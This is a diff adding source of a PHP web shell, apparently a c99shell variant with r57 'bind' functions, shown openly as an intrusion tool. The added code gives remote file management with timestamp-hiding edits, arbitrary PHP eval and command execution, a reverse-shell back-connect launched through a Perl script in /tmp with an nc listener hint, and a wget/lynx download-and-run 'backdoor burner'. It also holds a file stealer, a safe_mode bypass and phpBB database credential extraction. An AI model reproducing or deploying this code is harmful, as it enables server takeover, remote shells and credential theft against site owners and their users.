+    $row[] = date("d.m.Y H:i:s",$a[2]); 
+    if (!$win) {$row[] = $a[3];} 
+    $row[] = "<a href=\"".$surl."act=chmod&f=".$uo."&d=".$ud."\"><b>".view_perms_color($v)."</b></a>"; 
+    if ($o == ".") {$checkbox = "<input type=\"checkbox\" name=\"actbox[]\" onclick=\"ls_reverse_all();\">"; $i--;} 
+    else {$checkbox = "<input type=\"checkbox\" name=\"actbox[]\" id=\"actbox".$i."\" value=\"".htmlspecialchars($v)."\">";} 
+    if (is_dir($v)) {$row[] = "<a href=\"".$surl."act=d&d=".$uv."\"><img src=\"".$surl."act=img&img=ext_diz\" alt=\"Info\" height=\"16\" width=\"16\" border=\"0\"></a>&nbsp;".$checkbox;} 
+    else {$row[] = "<a href=\"".$surl."act=f&f=".$uo."&ft=info&d=".$ud."\"><img src=\"".$surl."act=img&img=ext_diz\" alt=\"Info\" height=\"16\" width=\"16\" border=\"0\"></a>&nbsp;<a href=\"".$surl."act=f&f=".$uo."&ft=edit&d=".$ud."\"><img src=\"".$surl."act=img&img=change\" alt=\"Change\" height=\"16\" width=\"19\" border=\"0\"></a>&nbsp;<a href=\"".$surl."act=f&f=".$uo."&ft=download&d=".$ud."\"><img src=\"".$surl."act=img&img=download\" alt=\"Download\" height=\"16\" width=\"19\" border=\"0\"></a>&nbsp;".$checkbox;} 
+    if (($o == ".") or ($o == "..")) {$tab["head"][] = $row;} 
+    elseif (is_link($v)) {$tab["links"][] = $row;} 
+    elseif (is_dir($v)) {$tab["folders"][] = $row;} 
+    elseif (is_file($v)) {$tab["files"][] = $row;} 
+    $i++; 
+   } 
+  } 
+  // Compiling table 
+  $table = array_merge($tab["cols"],$tab["head"],$tab["folders"],$tab["links"],$tab["files"]); 
+  echo "<center><b>Listing folder (".count($tab["files"])." files and ".(count($tab["folders"])+count($tab["links"]))." folders):</b></center><br><TABLE cellSpacing=0 cellPadding=0 width=100% bgcolor=#000000 borderColorLight=#433333 border=0><form action=\"".$surl."\" method=POST name=\"ls_form\"><input type=hidden name=act value=".$dspact."><input type=hidden name=d value=".$d.">"; 
+  foreach($table as $row) 
+  { 
+   echo "<tr>\r\n"; 
+   foreach($row as $v) {echo "<td>".$v."</td>\r\n";} 
+   echo "</tr>\r\n"; 
+  } 
+  echo "</table><hr size=\"1\" noshade><p align=\"right\"> 
+  <script> 
+  function ls_setcheckboxall(status) 
+  { 
+   var id = 1; 
+   var num = ".(count($table)-2)."; 
+   while (id <= num) 
+   { 
+    document.getElementById('actbox'+id).checked = status; 
+    id++; 
+   } 
+  } 
+  function ls_reverse_all() 
+  { 
+   var id = 1; 
+   var num = ".(count($table)-2)."; 
+   while (id <= num) 
+   { 
+    document.getElementById('actbox'+id).checked = !document.getElementById('actbox'+id).checked; 
+    id++; 
+   } 
+  } 
+  </script> 
+  <input type=\"button\" onclick=\"ls_setcheckboxall(true);\" value=\"Select all\">&nbsp;&nbsp;<input type=\"button\" onclick=\"ls_setcheckboxall(false);\" value=\"Unselect all\">  
+  <b><img src=\"".$surl."act=img&img=arrow_ltr\" border=\"0\">"; 
+  if (count(array_merge($sess_data["copy"],$sess_data["cut"])) > 0 and ($usefsbuff)) 
+  { 
+   echo "<input type=submit name=actarcbuff value=\"Pack buffer to archive\">&nbsp;<input type=\"text\" name=\"actarcbuff_path\" value=\"archive_".substr(md5(rand(1,1000).rand(1,1000)),0,5).".tar.gz\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<input type=submit name=\"actpastebuff\" value=\"Paste\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<input type=submit name=\"actemptybuff\" value=\"Empty buffer\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;"; 
+  } 
+  echo "<select name=act><option value=\"".$act."\">With selected:</option>"; 
+  echo "<option value=delete".($dspact == "delete"?" selected":"").">Delete</option>"; 
+  echo "<option value=chmod".($dspact == "chmod"?" selected":"").">Change-mode</option>"; 
+  if ($usefsbuff) 
+  { 
+   echo "<option value=cut".($dspact == "cut"?" selected":"").">Cut</option>"; 
+   echo "<option value=copy".($dspact == "copy"?" selected":"").">Copy</option>"; 
+   echo "<option value=unselect".($dspact == "unselect"?" selected":"").">Unselect</option>"; 
+  } 
+  echo "</select>&nbsp;<input type=submit value=\"Confirm\"></p>"; 
+  echo "</form>"; 
+ } 
+} 
+if ($act == "tools") 
+{ 
+
+
+
+
+
+
+ ?> 
+<TABLE style="BORDER-COLLAPSE: collapse" cellSpacing=0 borderColorDark=#666666 cellPadding=5 height="116" width="100%" bgcolor=#000000 borderColorLight=#c0c0c0 border=1>
+<tr><td height="1" valign="top" colspan="2"><p align="center"><b>:: <a href="<?php echo $surl; ?>act=cmd&d=<?php echo urlencode($d); ?>"><b>Bind Functions By r57  </b></a> ::</b></p></td></tr>
+<tr>
+  <td width="50%" height="83" valign="top"><center>
+    <div align="center">
+    </div>
+ <form action="<?php echo $surl; ?>">
+<b>Bind With Backd00r Burner</b></br><form action="<?php echo $surl;?>"><input type=hidden name=act value=tools><select size=\"1\" name=dolma><option value="wgetcan">Use Wget</option><option value="lynxcan">Use lynx -dump</option><option value="freadcan">Use Fread</option></select></br></br><input type="submit" value="Burn it bAby"></form>
+    </td>
+  <td width="50%" height="83" valign="top"><center>
+   <center>
+  
+ 
+   <b>Back-Connection :</b></br><form action="<?php echo $surl;?>"> <b>Ip (default is your ip) :</br> </b><input type=hidden name=act value=tools><input type="text" name="ipi" value="<?echo getenv('REMOTE_ADDR');?>"></br><b>Port:</br></b><input type="text" name="pipi" value="4392"></br><input type="submit" value="C0nnect ->"></br></form>
+Click "Connect" only after open port for it. You should use NetCat&copy;, run "<b>nc -l -n -v -p <?php echo $bc_port; ?></b>"!<br><br>
+   
+   </center>
+    </td>
+</tr></TABLE>
+ 
+ 
+ 
+ 
+ 
+
+
+<TABLE style="BORDER-COLLAPSE: collapse" cellSpacing=0 borderColorDark=#666666 cellPadding=5 height="116" width="100%" bgcolor=#000000 borderColorLight=#c0c0c0 border=1>
+<tr><td height="1" valign="top" colspan="2"><p align="center"><b>:: <a href="<?php echo $surl; ?>act=cmd&d=<?php echo urlencode($d); ?>"><b>File Stealer Function Ripped fRom Tontonq 's File Stealer ... </b></a> ::</b></p></td></tr>
+<tr>
+  <td width="50%" height="83" valign="top"><center>
+    <div align="center"><b>Safe_Mode Bypass</b>
+    <form action="<?php echo $surl; ?>" method="POST">
+    <input type=hidden name=act value=tools>
+    <textarea name="erorr" cols=100 rows=10></textarea></br>
+    <input type="text" name="nere" value="<?echo "$real\index.php";?> "size=84>
+    <input type="submit" value="Write 2 File !!">
+    
+    </form>
+    
+    
+    
+    
+    
+    
+    
+    
+    
+    
+    
+    </div>
+ 
+    </td>
+  <td width="50%" height="83" valign="top"><center>
+   <center>
+   <form action="<?php echo $surl; ?>" method="POST">
+   <input type=hidden name=act value=tools>
+   Dosyanin Adresi ? = <input type="text" name="dosyaa" size="81" maxlength=500  value=""><br><br> 
+Nereya Kaydolcak? = <input type="text" name="yeniyer" size=81 maxlength=191 value="<?php echo "$real/sploitz.zip"; ?>"><br><br> 
+<input type=submit class='stealthSubmit' Value='Dosyayi Chek'> 
+</form>
+<br><br><br>
+   
+   
+   
+   
+   </center>
+   
+   </center>
+    </td>
+</tr></TABLE>
+
+
+
+
+
+
+
+
+
+
+
+
+<?php 
+
+if (isset($_POST['dosyaa']))
+{
+dosyayicek($_POST['dosyaa'],$_POST['yeniyer']);
+
+}
+if (!empty($_GET['ipi']) && !empty($_GET['pipi'])) 
+{ 
+ cf("/tmp/back",$back_connect); 
+ $p2=which("perl"); 
+ $blah = ex($p2." /tmp/back ".$_GET['ipi']." ".$_GET['pipi']." &"); 
+echo"<b>Now script try connect to ".$_GET['ipi']." port ".$_GET['pipi']." ...</b>"; 
+} 
+if (!empty($_GET['dolma'])) 
+{  
+$sayko=htmlspecialchars($_GET['dolma']); 
+if ($sayko == "wgetcan") 
+{ 
+
+myshellexec("wget $adires -O sayko_bind;chmod 777 sayko_bind;./sayko_bind"); 
+
+
+} 
+
+else if ($sayko =="freadcan") 
+{ 
+dosyayicek($adires,"sayko_bind");
+myshellexec("./sayko_bind");
+} 
+
+else if ($sayko == "lynxcan") 
+{ 
+myshellexec("lynx -dump $adires > sayko_bind;chmod 777 sayko_bind;./sayko_bind"); 
+
+} 
+
+
+
+
+
+} 
+
+if  (!empty($_POST['erorr'])) 
+{
+
+
+
+error_log($_POST['erorr'], 3, "php://".$_POST['nere']);
+
+
+
+}
+
+
+
+
+
+
+
+
+
+} 
+if ($act == "processes") 
+{ 
+ echo "<b>Processes:</b><br>"; 
+ if (!$win) {$handler = "ps -aux".($grep?" | grep '".addslashes($grep)."'":"");} 
+ else {$handler = "tasklist";} 
+ $ret = myshellexec($handler); 
+ if (!$ret) {echo "Can't execute \"".$handler."\"!";} 
+ else 
+ { 
+  if (empty($processes_sort)) {$processes_sort = $sort_default;} 
+  $parsesort = parsesort($processes_sort); 
+  if (!is_numeric($parsesort[0])) {$parsesort[0] = 0;} 
+  $k = $parsesort[0]; 
+  if ($parsesort[1] != "a") {$y = "<a href=\"".$surl."act=".$dspact."&d=".urlencode($d)."&processes_sort=".$k."a\"><img src=\"".$surl."act=img&img=sort_desc\" height=\"9\" width=\"14\" border=\"0\"></a>";} 
+  else {$y = "<a href=\"".$surl."act=".$dspact."&d=".urlencode($d)."&processes_sort=".$k."d\"><img src=\"".$surl."act=img&img=sort_asc\" height=\"9\" width=\"14\" border=\"0\"></a>";} 
+  $ret = htmlspecialchars($ret); 
+  if (!$win) 
+  { 
+   if ($pid) 
+   { 
+    if (is_null($sig)) {$sig = 9;} 
+    echo "Sending signal ".$sig." to #".$pid."... "; 
+    if (posix_kill($pid,$sig)) {echo "OK.";} 
+    else {echo "ERROR.";} 
+   } 
+   while (ereg("  ",$ret)) {$ret = str_replace("  "," ",$ret);} 
+   $stack = explode("\n",$ret); 
+   $head = explode(" ",$stack[0]); 
+   unset($stack[0]); 
+   for($i=0;$i<count($head);$i++) 
+   { 
+    if ($i != $k) {$head[$i] = "<a href=\"".$surl."act=".$dspact."&d=".urlencode($d)."&processes_sort=".$i.$parsesort[1]."\"><b>".$head[$i]."</b></a>";} 
+   } 
+   $prcs = array(); 
+   foreach ($stack as $line) 
+   { 
+    if (!empty($line)) 
+{ 
+ echo "<tr>"; 
+     $line = explode(" ",$line); 
+     $line[10] = join(" ",array_slice($line,10)); 
+     $line = array_slice($line,0,11); 
+     if ($line[0] == get_current_user()) {$line[0] = "<font color=green>".$line[0]."</font>";} 
+     $line[] = "<a href=\"".$surl."act=processes&d=".urlencode($d)."&pid=".$line[1]."&sig=9\"><u>KILL</u></a>"; 
+     $prcs[] = $line; 
+     echo "</tr>"; 
+    } 
+   } 
+  } 
+  else 
+  { 
+   while (ereg("  ",$ret)) {$ret = str_replace("  ","",$ret);} 
+   while (ereg("  ",$ret)) {$ret = str_replace("  ","",$ret);} 
+   while (ereg("  ",$ret)) {$ret = str_replace("  ","",$ret);} 
+   while (ereg("  ",$ret)) {$ret = str_replace("  ","",$ret);} 
+   while (ereg("  ",$ret)) {$ret = str_replace("  ","",$ret);} 
+   while (ereg("  ",$ret)) {$ret = str_replace("  ","",$ret);} 
+   while (ereg("  ",$ret)) {$ret = str_replace("  ","",$ret);} 
+   while (ereg("  ",$ret)) {$ret = str_replace("  ","",$ret);} 
+   while (ereg("  ",$ret)) {$ret = str_replace("  ","",$ret);} 
+   while (ereg("",$ret)) {$ret = str_replace("","",$ret);} 
+   while (ereg(" ",$ret)) {$ret = str_replace(" ","",$ret);} 
+   $ret = convert_cyr_string($ret,"d","w"); 
+   $stack = explode("\n",$ret); 
+   unset($stack[0],$stack[2]); 
+   $stack = array_values($stack); 
+   $head = explode("",$stack[0]); 
+   $head[1] = explode(" ",$head[1]); 
+   $head[1] = $head[1][0]; 
+   $stack = array_slice($stack,1); 
+   unset($head[2]); 
+   $head = array_values($head); 
+   if ($parsesort[1] != "a") {$y = "<a href=\"".$surl."act=".$dspact."&d=".urlencode($d)."&processes_sort=".$k."a\"><img src=\"".$surl."act=img&img=sort_desc\" height=\"9\" width=\"14\" border=\"0\"></a>";} 
+   else {$y = "<a href=\"".$surl."act=".$dspact."&d=".urlencode($d)."&processes_sort=".$k."d\"><img src=\"".$surl."act=img&img=sort_asc\" height=\"9\" width=\"14\" border=\"0\"></a>";} 
+   if ($k > count($head)) {$k = count($head)-1;} 
+   for($i=0;$i<count($head);$i++) 
+   { 
+    if ($i != $k) {$head[$i] = "<a href=\"".$surl."act=".$dspact."&d=".urlencode($d)."&processes_sort=".$i.$parsesort[1]."\"><b>".trim($head[$i])."</b></a>";} 
+   } 
+   $prcs = array(); 
+   foreach ($stack as $line) 
+   { 
+    if (!empty($line)) 
+    { 
+     echo "<tr>"; 
+     $line = explode("",$line); 
+     $line[1] = intval($line[1]); $line[2] = $line[3]; unset($line[3]); 
+     $line[2] = intval(str_replace(" ","",$line[2]))*1024;  
+     $prcs[] = $line; 
+     echo "</tr>"; 
+    } 
+   } 
+  } 
+  $head[$k] = "<b>".$head[$k]."</b>".$y; 
+  $v = $processes_sort[0]; 
+  usort($prcs,"tabsort"); 
+  if ($processes_sort[1] == "d") {$prcs = array_reverse($prcs);} 
+  $tab = array(); 
+  $tab[] = $head; 
+  $tab = array_merge($tab,$prcs); 
+  echo "<TABLE height=1 cellSpacing=0 borderColorDark=#666666 cellPadding=5 width=\"100%\" bgcolor=#000000 borderColorLight=#c0c0c0 border=1 bordercolor=\"#C0C0C0\">"; 
+  foreach($tab as $i=>$k) 
+  { 
+   echo "<tr>"; 
+   foreach($k as $j=>$v) {if ($win and $i > 0 and $j == 2) {$v = view_size($v);} echo "<td>".$v."</td>";} 
+   echo "</tr>"; 
+  } 
+  echo "</table>"; 
+ } 
+} 
+if ($act == "eval") 
+{ 
+ if (!empty($eval)) 
+ { 
+  echo "<b>Result of execution this PHP-code</b>:<br>"; 
+  $tmp = ob_get_contents(); 
+  $olddir = realpath("."); 
+  @chdir($d); 
+  if ($tmp) 
+  { 
+   ob_clean(); 
+   eval($eval); 
+   $ret = ob_get_contents(); 
+   $ret = convert_cyr_string($ret,"d","w"); 
+   ob_clean(); 
+   echo $tmp; 
+   if ($eval_txt) 
+   { 
+    $rows = count(explode("\r\n",$ret))+1; 
+    if ($rows < 10) {$rows = 10;} 
+    echo "<br><textarea cols=\"122\" rows=\"".$rows."\" readonly>".htmlspecialchars($ret)."</textarea>"; 
+   } 
+   else {echo $ret."<br>";} 
+  } 
+  else 
+  { 
+   if ($eval_txt) 
+   { 
+    echo "<br><textarea cols=\"122\" rows=\"15\" readonly>"; 
+    eval($eval); 
+    echo "</textarea>"; 
+   } 
+   else {echo $ret;} 
+  } 
+  @chdir($olddir); 
+ } 
+ else {echo "<b>Execution PHP-code</b>"; if (empty($eval_txt)) {$eval_txt = TRUE;}} 
+ echo "<form action=\"".$surl."\" method=POST><input type=hidden name=act value=eval><textarea name=\"eval\" cols=\"122\" rows=\"10\">".htmlspecialchars($eval)."</textarea><input type=hidden name=\"d\" value=\"".$dispd."\"><br><br><input type=submit value=\"Execute\">&nbsp;Display in text-area&nbsp;<input type=\"checkbox\" name=\"eval_txt\" value=\"1\""; if ($eval_txt) {echo " checked";} echo "></form>"; 
+} 
+if ($act == "f") 
+{ 
+ if ((!is_readable($d.$f) or is_dir($d.$f)) and $ft != "edit") 
+ { 
+  if (file_exists($d.$f)) {echo "<center><b>Permision denied (".htmlspecialchars($d.$f).")!</b></center>";} 
+  else {echo "<center><b>File does not exists (".htmlspecialchars($d.$f).")!</b><br><a href=\"".$surl."act=f&f=".urlencode($f)."&ft=edit&d=".urlencode($d)."&c=1\"><u>Create</u></a></center>";} 
+ } 
+ else 
+ { 
+  $r = @file_get_contents($d.$f); 
+  $ext = explode(".",$f); 
+  $c = count($ext)-1; 
+  $ext = $ext[$c]; 
+  $ext = strtolower($ext); 
+  $rft = ""; 
+  foreach($ftypes as $k=>$v) {if (in_array($ext,$v)) {$rft = $k; break;}} 
+  if (eregi("sess_(.*)",$f)) {$rft = "phpsess";} 
+  if (empty($ft)) {$ft = $rft;} 
+  $arr = array( 
+   array("<img src=\"".$surl."act=img&img=ext_diz\" border=\"0\">","info"), 
+   array("<img src=\"".$surl."act=img&img=ext_html\" border=\"0\">","html"), 
+   array("<img src=\"".$surl."act=img&img=ext_txt\" border=\"0\">","txt"), 
+   array("Code","code"), 
+   array("Session","phpsess"), 
+   array("<img src=\"".$surl."act=img&img=ext_exe\" border=\"0\">","exe"), 
+   array("SDB","sdb"), 
+   array("<img src=\"".$surl."act=img&img=ext_gif\" border=\"0\">","img"), 
+   array("<img src=\"".$surl."act=img&img=ext_ini\" border=\"0\">","ini"), 
+   array("<img src=\"".$surl."act=img&img=download\" border=\"0\">","download"), 
+   array("<img src=\"".$surl."act=img&img=ext_rtf\" border=\"0\">","notepad"), 
+   array("<img src=\"".$surl."act=img&img=change\" border=\"0\">","edit") 
+  ); 
+  echo "<b>Viewing file:&nbsp;&nbsp;&nbsp;&nbsp;<img src=\"".$surl."act=img&img=ext_".$ext."\" border=\"0\">&nbsp;".$f." (".view_size(filesize($d.$f)).") &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;".view_perms_color($d.$f)."</b><br>Select action/file-type:<br>"; 
+  foreach($arr as $t) 
+  { 
+   if ($t[1] == $rft) {echo " <a href=\"".$surl."act=f&f=".urlencode($f)."&ft=".$t[1]."&d=".urlencode($d)."\"><font color=green>".$t[0]."</font></a>";} 
+   elseif ($t[1] == $ft) {echo " <a href=\"".$surl."act=f&f=".urlencode($f)."&ft=".$t[1]."&d=".urlencode($d)."\"><b><u>".$t[0]."</u></b></a>";} 
+   else {echo " <a href=\"".$surl."act=f&f=".urlencode($f)."&ft=".$t[1]."&d=".urlencode($d)."\"><b>".$t[0]."</b></a>";} 
+   echo " (<a href=\"".$surl."act=f&f=".urlencode($f)."&ft=".$t[1]."&white=1&d=".urlencode($d)."\" target=\"_blank\">+</a>) |"; 
+  } 
+  echo "<hr size=\"1\" noshade>"; 
+  if ($ft == "info") 
+  { 
+   echo "<b>Information:</b><table border=0 cellspacing=1 cellpadding=2><tr><td><b>Path</b></td><td> ".$d.$f."</td></tr><tr><td><b>Size</b></td><td> ".view_size(filesize($d.$f))."</td></tr><tr><td><b>MD5</b></td><td> ".md5_file($d.$f)."</td></tr>"; 
+   if (!$win) 
+   { 
+    echo "<tr><td><b>Owner/Group</b></td><td> ";     
+    $ow = posix_getpwuid(fileowner($d.$f)); 
+    $gr = posix_getgrgid(filegroup($d.$f)); 
+    echo ($ow["name"]?$ow["name"]:fileowner($d.$f))."/".($gr["name"]?$gr["name"]:filegroup($d.$f)); 
+   } 
+   echo "<tr><td><b>Perms</b></td><td><a href=\"".$surl."act=chmod&f=".urlencode($f)."&d=".urlencode($d)."\">".view_perms_color($d.$f)."</a></td></tr><tr><td><b>Create time</b></td><td> ".date("d/m/Y H:i:s",filectime($d.$f))."</td></tr><tr><td><b>Access time</b></td><td> ".date("d/m/Y H:i:s",fileatime($d.$f))."</td></tr><tr><td><b>MODIFY time</b></td><td> ".date("d/m/Y H:i:s",filemtime($d.$f))."</td></tr></table><br>"; 
+   $fi = fopen($d.$f,"rb"); 
+   if ($fi) 
+   { 
+    if ($fullhexdump) {echo "<b>FULL HEXDUMP</b>"; $str = fread($fi,filesize($d.$f));} 
+    else {echo "<b>HEXDUMP PREVIEW</b>"; $str = fread($fi,$hexdump_lines*$hexdump_rows);} 
+    $n = 0; 
+    $a0 = "00000000<br>"; 
+    $a1 = ""; 
+    $a2 = ""; 
+    for ($i=0; $i<strlen($str); $i++) 
+    { 
+     $a1 .= sprintf("%02X",ord($str[$i]))." "; 
+     switch (ord($str[$i])) 
+     { 
+      case 0:  $a2 .= "<font>0</font>"; break; 
+      case 32: 
+      case 10: 
+      case 13: $a2 .= "&nbsp;"; break; 
+      default: $a2 .= htmlspecialchars($str[$i]); 
+     } 
+     $n++; 
+     if ($n == $hexdump_rows) 
+     { 
+      $n = 0; 
+      if ($i+1 < strlen($str)) {$a0 .= sprintf("%08X",$i+1)."<br>";} 
+      $a1 .= "<br>"; 
+      $a2 .= "<br>"; 
+     } 
+    } 
+    //if ($a1 != "") {$a0 .= sprintf("%08X",$i)."<br>";} 
+    echo "<table border=0 bgcolor=#666666 cellspacing=1 cellpadding=4><tr><td bgcolor=#666666>".$a0."</td><td bgcolor=000000>".$a1."</td><td bgcolor=000000>".$a2."</td></tr></table><br>"; 
+   } 
+   $encoded = ""; 
+   if ($base64 == 1) 
+   { 
+    echo "<b>Base64 Encode</b><br>"; 
+    $encoded = base64_encode(file_get_contents($d.$f)); 
+   } 
+   elseif($base64 == 2) 
+   { 
+    echo "<b>Base64 Encode + Chunk</b><br>"; 
+    $encoded = chunk_split(base64_encode(file_get_contents($d.$f))); 
+   } 
+   elseif($base64 == 3) 
+   { 
+    echo "<b>Base64 Encode + Chunk + Quotes</b><br>"; 
+    $encoded = base64_encode(file_get_contents($d.$f)); 
+    $encoded = substr(preg_replace("!.{1,76}!","'\\0'.\n",$encoded),0,-2); 
+   } 
+   elseif($base64 == 4) 
+   { 
+    $text = file_get_contents($d.$f); 
+    $encoded = base64_decode($text); 
+    echo "<b>Base64 Decode"; 
+    if (base64_encode($encoded) != $text) {echo " (failed)";} 
+    echo "</b><br>"; 
+   } 
+   if (!empty($encoded)) 
+   { 
+    echo "<textarea cols=80 rows=10>".htmlspecialchars($encoded)."</textarea><br><br>"; 
+   } 
+   echo "<b>HEXDUMP:</b><nobr> [<a href=\"".$surl."act=f&f=".urlencode($f)."&ft=info&fullhexdump=1&d=".urlencode($d)."\">Full</a>] [<a href=\"".$surl."act=f&f=".urlencode($f)."&ft=info&d=".urlencode($d)."\">Preview</a>]<br><b>Base64: </b> 
+<nobr>[<a href=\"".$surl."act=f&f=".urlencode($f)."&ft=info&base64=1&d=".urlencode($d)."\">Encode</a>]&nbsp;</nobr> 
+<nobr>[<a href=\"".$surl."act=f&f=".urlencode($f)."&ft=info&base64=2&d=".urlencode($d)."\">+chunk</a>]&nbsp;</nobr> 
+<nobr>[<a href=\"".$surl."act=f&f=".urlencode($f)."&ft=info&base64=3&d=".urlencode($d)."\">+chunk+quotes</a>]&nbsp;</nobr> 
+<nobr>[<a href=\"".$surl."act=f&f=".urlencode($f)."&ft=info&base64=4&d=".urlencode($d)."\">Decode</a>]&nbsp;</nobr> 
+<P>"; 
+  } 
+  elseif ($ft == "html") 
+  { 
+   if ($white) {@ob_clean();} 
+   echo $r; 
+   if ($white) {c99shexit();} 
+  } 
+  elseif ($ft == "txt") {echo "<pre>".htmlspecialchars($r)."</pre>";} 
+  elseif ($ft == "ini") {echo "<pre>"; var_dump(parse_ini_file($d.$f,TRUE)); echo "</pre>";} 
+  elseif ($ft == "phpsess") 
+  { 
+   echo "<pre>"; 
+   $v = explode("|",$r); 
+   echo $v[0]."<br>"; 
+   var_dump(unserialize($v[1])); 
+   echo "</pre>"; 
+  } 
+  elseif ($ft == "exe") 
+  { 
+   $ext = explode(".",$f); 
+   $c = count($ext)-1; 
+   $ext = $ext[$c]; 
+   $ext = strtolower($ext); 
+   $rft = ""; 
+   foreach($exeftypes as $k=>$v) 
+   { 
+    if (in_array($ext,$v)) {$rft = $k; break;} 
+   } 
+   $cmd = str_replace("%f%",$f,$rft); 
+   echo "<b>Execute file:</b><form action=\"".$surl."\" method=POST><input type=hidden name=act value=cmd><input type=\"text\" name=\"cmd\" value=\"".htmlspecialchars($cmd)."\" size=\"".(strlen($cmd)+2)."\"><br>Display in text-area<input type=\"checkbox\" name=\"cmd_txt\" value=\"1\" checked><input type=hidden name=\"d\" value=\"".htmlspecialchars($d)."\"><br><input type=submit name=submit value=\"Execute\"></form>"; 
+  } 
+  elseif ($ft == "sdb") {echo "<pre>"; var_dump(unserialize(base64_decode($r))); echo "</pre>";} 
+  elseif ($ft == "code") 
+  { 
+   if (ereg("php"."BB 2.(.*) auto-generated config file",$r)) 
+   { 
+    $arr = explode("\n",$r); 
+    if (count($arr == 18)) 
+    { 
+     include($d.$f); 
+     echo "<b>phpBB configuration is detected in this file!<br>"; 
+     if ($dbms == "mysql4") {$dbms = "mysql";} 
+     if ($dbms == "mysql") {echo "<a href=\"".$surl."act=sql&sql_server=".htmlspecialchars($dbhost)."&sql_login=".htmlspecialchars($dbuser)."&sql_passwd=".htmlspecialchars($dbpasswd)."&sql_port=3306&sql_db=".htmlspecialchars($dbname)."\"><b><u>Connect to DB</u></b></a><br><br>";} 
+     else {echo "But, you can't connect to forum sql-base, because db-software=\"".$dbms."\" is not supported by c99shell. Please, report us for fix.";} 
+     echo "Parameters for manual connect:<br>"; 
+     $cfgvars = array("dbms"=>$dbms,"dbhost"=>$dbhost,"dbname"=>$dbname,"dbuser"=>$dbuser,"dbpasswd"=>$dbpasswd); 
+     foreach ($cfgvars as $k=>$v) {echo htmlspecialchars($k)."='".htmlspecialchars($v)."'<br>";} 
+     echo "</b><hr size=\"1\" noshade>"; 
+    } 
+   } 
+   echo "<div style=\"border : 0px solid #FFFFFF; padding: 1em; margin-top: 1em; margin-bottom: 1em; margin-right: 1em; margin-left: 1em; background-color: ".$highlight_background .";\">"; 
+   if (!empty($white)) {@ob_clean();} 
+   highlight_file($d.$f); 
+   if (!empty($white)) {c99shexit();} 
+   echo "</div>"; 
+  } 
+  elseif ($ft == "download") 
+  { 
+   @ob_clean(); 
+   header("Content-type: application/octet-stream"); 
+   header("Content-length: ".filesize($d.$f)); 
+   header("Content-disposition: attachment; filename=\"".$f."\";"); 
+   echo $r; 
+   exit; 
+  } 
+  elseif ($ft == "notepad") 
+  { 
+   @ob_clean(); 
+   header("Content-type: text/plain"); 
+   header("Content-disposition: attachment; filename=\"".$f.".txt\";"); 
+   echo($r); 
+   exit; 
+  } 
+  elseif ($ft == "img") 
+  { 
+   $inf = getimagesize($d.$f); 
+   if (!$white) 
+   { 
+    if (empty($imgsize)) {$imgsize = 20;} 
+    $width = $inf[0]/100*$imgsize; 
+    $height = $inf[1]/100*$imgsize; 
+    echo "<center><b>Size:</b>&nbsp;"; 
+    $sizes = array("100","50","20"); 
+    foreach ($sizes as $v) 
+    { 
+     echo "<a href=\"".$surl."act=f&f=".urlencode($f)."&ft=img&d=".urlencode($d)."&imgsize=".$v."\">"; 
+     if ($imgsize != $v ) {echo $v;} 
+     else {echo "<u>".$v."</u>";} 
+     echo "</a>&nbsp;&nbsp;&nbsp;"; 
+    } 
+    echo "<br><br><img src=\"".$surl."act=f&f=".urlencode($f)."&ft=img&white=1&d=".urlencode($d)."\" width=\"".$width."\" height=\"".$height."\" border=\"1\"></center>"; 
+   } 
+   else 
+   { 
+    @ob_clean(); 
+    $ext = explode($f,"."); 
+    $ext = $ext[count($ext)-1]; 
+    header("Content-type: ".$inf["mime"]); 
+    readfile($d.$f); 
+    exit; 
+   } 
+  } 
+  elseif ($ft == "edit") 
+  { 
+   if (!empty($submit)) 
+   { 
+    if ($filestealth) {$stat = stat($d.$f);} 
+    $fp = fopen($d.$f,"w"); 
+    if (!$fp) {echo "<b>Can't write to file!</b>";} 
+    else 
+    { 
+     echo "<b>Saved!</b>"; 
+     fwrite($fp,$edit_text); 
+     fclose($fp); 
+     if ($filestealth) {touch($d.$f,$stat[9],$stat[8]);} 
+     $r = $edit_text; 
+    } 
+   } 
+   $rows = count(explode("\r\n",$r)); 
+   if ($rows < 10) {$rows = 10;} 
+   if ($rows > 30) {$rows = 30;} 
+   echo "<form action=\"".$surl."act=f&f=".urlencode($f)."&ft=edit&d=".urlencode($d)."\" method=POST><input type=submit name=submit value=\"Save\">&nbsp;<input type=\"reset\" value=\"Reset\">&nbsp;<input type=\"button\" onclick=\"location.href='".addslashes($surl."act=ls&d=".substr($d,0,-1))."';\" value=\"Back\"><br><textarea name=\"edit_text\" cols=\"122\" rows=\"".$rows."\">".htmlspecialchars($r)."</textarea></form>"; 
+  } 
+  elseif (!empty($ft)) {echo "<center><b>Manually selected type is incorrect. If you think, it is mistake, please send us url and dump of \$GLOBALS.</b></center>";} 
+  else {echo "<center><b>Unknown extension (".$ext."), please, select type manually.</b></center>";} 
+ } 
+} 
+} 
+else 
+{ 
+ @ob_clean(); 
+ $images = array( 
+"arrow_ltr"=> 
+"R0lGODlhJgAWAIAAAAAAAP///yH5BAUUAAEALAAAAAAmABYAAAIvjI+py+0PF4i0gVvzuVxXDnoQ". 
+"SIrUZGZoerKf28KjPNPOaku5RfZ+uQsKh8RiogAAOw==", 
+"back"=> 
+"R0lGODlhFAAUAKIAAAAAAP///93d3cDAwIaGhgQEBP///wAAACH5BAEAAAYALAAAAAAUABQAAAM8". 
+"aLrc/jDKSWWpjVysSNiYJ4CUOBJoqjniILzwuzLtYN/3zBSErf6kBW+gKRiPRghPh+EFK0mOUEqt". 
+"Wg0JADs=", 
+"buffer"=> 
+"R0lGODlhFAAUAKIAAAAAAP////j4+N3d3czMzLKysoaGhv///yH5BAEAAAcALAAAAAAUABQAAANo". 
+"eLrcribG90y4F1Amu5+NhY2kxl2CMKwrQRSGuVjp4LmwDAWqiAGFXChg+xhnRB+ptLOhai1crEmD". 
+"Dlwv4cEC46mi2YgJQKaxsEGDFnnGwWDTEzj9jrPRdbhuG8Cr/2INZIOEhXsbDwkAOw==", 
+"change"=> 
+"R0lGODlhFAAUAMQfAL3hj7nX+pqo1ejy/f7YAcTb+8vh+6FtH56WZtvr/RAQEZecx9Ll/PX6/v3+". 
+"/3eHt6q88eHu/ZkfH3yVyIuQt+72/kOm99fo/P8AZm57rkGS4Hez6pil9oep3GZmZv///yH5BAEA". 
